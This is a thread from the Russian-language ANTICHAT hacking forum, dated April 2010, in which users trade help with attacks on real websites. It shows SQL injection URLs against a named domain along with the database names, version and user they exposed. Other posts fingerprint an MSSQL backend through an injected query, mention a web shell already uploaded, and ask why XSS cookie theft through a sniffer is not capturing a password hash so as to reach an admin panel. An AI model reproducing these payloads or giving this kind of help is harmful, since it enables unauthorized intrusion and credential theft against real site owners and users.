ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.04.2010, 00:22
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме: 568388
Репутация:
87
|
|
Сообщение от S[N]EP
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку
PHP код:
Ошибка запроса: 'select name,parentid from kn_tree where id=1 union all select 1'
а если запрос изменить на:
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1, 2
то ошибка уже
PHP код:
Ошибка запроса: 'select typeid from kn_tree where id=1 union all select 1,2'
что это значит? и как подобрать количество полей.?
кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая...
Version: 5.5.2-m2-log
Database: information_schema / knife / knife_forum / knife_phpbb2
Installation dir: /usr/local/
User: knife@localhost
слепая
з.ы щяс порыскаю может ище чтото найду
Последний раз редактировалось [Feldmarschall]; 13.04.2010 в 00:25..
|
|
|

13.04.2010, 00:56
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме: 587324
Репутация:
40
|
|
Как определить какая СУБД?
вылазит такая ошибка
Вывода добиться не получилось
select top 1 * from dbo.OnlcPages where url_path_en in ('tenders/','tenders/c0/','tenders/c0/'--+a/') or url_path in ('tenders/','tenders/c0/','tenders/c0/'--+a/') order by url_path_en desc
|
|
|

13.04.2010, 02:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от FAQ666
Как определить какая СУБД?
вылазит такая ошибка
Вывода добиться не получилось
select top 1 * from dbo.OnlcPages where url_path_en in ('tenders/','tenders/c0/','tenders/c0/'--+a/') or url_path in ('tenders/','tenders/c0/','tenders/c0/'--+a/') order by url_path_en desc
MSSQL вроде
|
|
|

13.04.2010, 09:41
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
Так и есть, MSSQL.
|
|
|

13.04.2010, 23:23
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
Залил шел, а там только белая страница, в чом проблема может быть??
|
|
|

14.04.2010, 01:10
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме: 390073
Репутация:
44
|
|
Вообщем возник такой вопрос... возможно ли абсолютно точно определить версию joomla 1.5 ?
Код:
<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
Это то понятно... а именно какая можно пробить ?
|
|
|

14.04.2010, 01:15
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме: 568388
Репутация:
87
|
|
Сообщение от DeepBlue7
Вообщем возник такой вопрос... возможно ли абсолютно точно определить версию joomla 1.5 ?
Код:
<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
Это то понятно... а именно какая можно пробить ?
no way man !
|
|
|

14.04.2010, 14:49
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 2
Провел на форуме: 20492
Репутация:
0
|
|
нашёл хсс активную на одном интересном для меня сайте, но возникла проблема с кражей куков..
Приходят все строки в куках но bbpassword=hash не приходит..
в опере смотрю у себя куки, есть bbpassword=hash а смотрю в логах сниффера нет такова.. это какая то защита от кражи куков или я что то не так делаю ? как быть, что с хсс делать ? как в админку попасть)
|
|
|

14.04.2010, 14:56
|
|
Познающий
Регистрация: 15.09.2008
Сообщений: 54
Провел на форуме: 612815
Репутация:
46
|
|
мы не экстрасенсы скинь сайт
|
|
|

14.04.2010, 15:34
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 2
Провел на форуме: 20492
Репутация:
0
|
|
Сайт где именно не буду говорить ) просто может кто встречался с этим случием и знает что делать.. у меня такое не с одним сайтом вообще встречалось.. как так, в опере есть кук с хешем: bbpassword а сниффер не ловит его.. как быть..
Последний раз редактировалось M@iL; 14.04.2010 в 17:39..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|